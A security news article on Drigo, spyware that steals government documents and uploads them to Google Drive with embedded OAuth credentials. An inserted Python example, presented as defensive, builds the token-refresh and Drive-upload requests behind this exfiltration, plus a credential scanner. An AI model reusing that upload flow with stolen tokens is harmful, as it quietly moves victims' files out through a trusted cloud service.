Drigo spyware exploits Google Drive in targeted attacks


Security experts at Trend Micro have discovered a cyber espionage campaign that uses a malware strain dubbed Drigo to siphon data through Google Drive.

Security experts at Trend Micro have uncovered a new wave of targeted attacks that steal information through Google Drive. The researchers detected a new strain of data-stealing malware, dubbed Drigo, that is apparently used in campaigns targeting government agencies worldwide. The malware siphons the user's files from the infected machine and sends them to Google Drive.

Drigo steals common document types, including Excel, Word, PDF, text and PowerPoint files, harvesting them from locations such as the Recycle Bin and the user's Documents folder, and uploads them to Google Drive. The abuse of cloud-based file-sharing services is becoming more frequent in the cybercrime ecosystem: in recent months security experts have detected RATs served through these platforms, and phishing campaigns that benefit from the legitimate SSL channels these services ordinarily use, so that the malicious traffic blends in with normal encrypted traffic to a trusted domain.

The techniques spotted by the investigators are designed to evade security vendors and researchers, and in many cases are very sophisticated.

In order to transfer the siphoned files to Google Drive, Drigo embeds in its code a client_id, a client_secret and a refresh token, the credentials used in the OAuth 2.0 authorization flow that Google's APIs require. With these three values the malware can request fresh access tokens at any time, without ever handling the account's password.

“Refresh tokens are needed as part of the OAuth 2.0 protocol, which is used by Google Drive. This protocol is used by Twitter, Facebook and other sites to use their accounts to log in to a different website,” states Trend Micro threats analyst Kervin Alintanahin in a blog post. “Access tokens are used to have access on a Google Drive account. However, access tokens expire so refresh tokens are needed to get new access tokens. We decrypted communication from the malware and saw activity such as requests for new tokens and uploading files.”
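The refresh-token exchange described above, followed by the file upload it enables, together with a static check for the embedded credentials, as an added example that is not part of the original article or of Trend Micro's analysis. It assumes Google's public OAuth 2.0 token endpoint and the Drive v2 multipart upload endpoint (the API generation current in 2014); the string formats used to spot credentials (client IDs ending in `.apps.googleusercontent.com`, refresh tokens beginning with `1/`) are assumptions made for triage, not details from the article. The token reply and the scanned buffer are constructed inline, so nothing here goes online.

```python
"""OAuth 2.0 refresh-token grant and Drive upload as a data stealer would use them,
plus a static check for hard-coded credentials. Added example; constructed data only."""
import json
import re
from urllib.parse import urlencode

TOKEN_ENDPOINT = "https://accounts.google.com/o/oauth2/token"
UPLOAD_ENDPOINT = "https://www.googleapis.com/upload/drive/v2/files?uploadType=multipart"


def build_refresh_request(client_id, client_secret, refresh_token):
    """Form body a client POSTs to trade a long-lived refresh token for a short-lived
    access token. No user password is involved; the three embedded values suffice."""
    form = urlencode({
        "client_id": client_id,
        "client_secret": client_secret,
        "refresh_token": refresh_token,
        "grant_type": "refresh_token",
    })
    return TOKEN_ENDPOINT, form


def parse_token_response(raw_json):
    """Extract the bearer token from the token endpoint's JSON reply.
    Raises ValueError on an error reply (e.g. invalid_grant once the token is revoked)."""
    reply = json.loads(raw_json)
    if "access_token" not in reply:
        raise ValueError("token refresh failed: " + str(reply.get("error", "unknown")))
    return reply["access_token"], int(reply.get("expires_in", 0))


def build_upload_request(access_token, filename, content, boundary="drigo_example_boundary"):
    """multipart/related body for a Drive v2 upload: JSON metadata part, then the file bytes."""
    metadata = json.dumps({"title": filename})
    head = ("--%s\r\nContent-Type: application/json; charset=UTF-8\r\n\r\n%s\r\n"
            "--%s\r\nContent-Type: application/octet-stream\r\n\r\n") % (boundary, metadata, boundary)
    body = head.encode() + content + ("\r\n--%s--" % boundary).encode()
    headers = {
        "Authorization": "Bearer " + access_token,
        "Content-Type": 'multipart/related; boundary="%s"' % boundary,
    }
    return UPLOAD_ENDPOINT, headers, body


# Static triage of a sample or memory dump for hard-coded Google OAuth credentials.
# Assumed formats (not from the article): client IDs end in ".apps.googleusercontent.com",
# refresh tokens of that era start with "1/" (newer ones with "1//").
CLIENT_ID_RE = re.compile(rb"[0-9]{6,}(?:-[0-9a-z]+)?\.apps\.googleusercontent\.com")
REFRESH_TOKEN_RE = re.compile(rb"1//?[A-Za-z0-9_\-]{20,}")


def find_embedded_oauth_creds(blob):
    """Return the distinct client IDs and refresh-token-like strings found in a byte buffer."""
    return {
        "client_ids": sorted({m.decode() for m in CLIENT_ID_RE.findall(blob)}),
        "refresh_tokens": sorted({m.decode() for m in REFRESH_TOKEN_RE.findall(blob)}),
    }


# Constructed sample: a strings-like slice of an imaginary dump with embedded credentials.
SAMPLE_DUMP = (b"\x00\x00client_id=123456789012-abcdefghijk.apps.googleusercontent.com\x00"
               b"client_secret=not_a_real_secret\x00"
               b"refresh_token=1/AbCdEf0123456789_-xyzXYZabcdef\x00Go build ID:")

# Constructed reply; a real token endpoint returns the same fields.
SAMPLE_TOKEN_REPLY = '{"access_token": "ya29.example", "expires_in": 3600, "token_type": "Bearer"}'


if __name__ == "__main__":
    creds = find_embedded_oauth_creds(SAMPLE_DUMP)
    print("embedded credentials:", creds)
    url, form = build_refresh_request(creds["client_ids"][0], "not_a_real_secret",
                                      creds["refresh_tokens"][0])
    print("POST", url, form)
    token, ttl = parse_token_response(SAMPLE_TOKEN_REPLY)
    url, headers, body = build_upload_request(token, "budget.xlsx", b"PK\x03\x04...")
    print("POST", url, headers["Authorization"], len(body), "bytes")
```

Two practical points follow from the flow. Revoking the refresh token (or disabling the OAuth client) is what actually stops the exfiltration: the next refresh call then returns an `invalid_grant` error, the failure path `parse_token_response` handles, and a fresh access token can no longer be obtained. And because the uploads are ordinary TLS traffic to Google's API hosts, blocking the destination domain is rarely an option; detection has to rely on which processes talk to the token endpoint and on the credentials a scan like `find_embedded_oauth_creds` turns up in samples.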

The investigation revealed targeted attacks against government agencies; the experts speculate that Drigo was designed for reconnaissance purposes.

[Image: Google Drive Drigo malware]

“After all, one of the key aspects in a successful attack is having enough information on the target. The more information they can gather, the more vector of attack they can use on their target,” noted Alintanahin.

Another interesting discovery made by the experts is the use of the open-source Go programming language, also known as golang, which was initially developed by Google.

“While interesting, the use of golang is not new; security researchers have seen golang-created malware as early as 2012. It would be hard to pinpoint the exact reason for using golang but some have attributed its appeal to its supposed lack of mainstream profile.” states the blog post.

Trend Micro has already alerted Google to the malicious activity associated with the Google Drive account used by the attackers. However, as the experts explain in the post, if Drigo can update its configuration file, the attackers can simply switch to other Google Drive accounts and continue their campaigns.

Pierluigi Paganini

(Security Affairs – Drigo malware, Google Drive)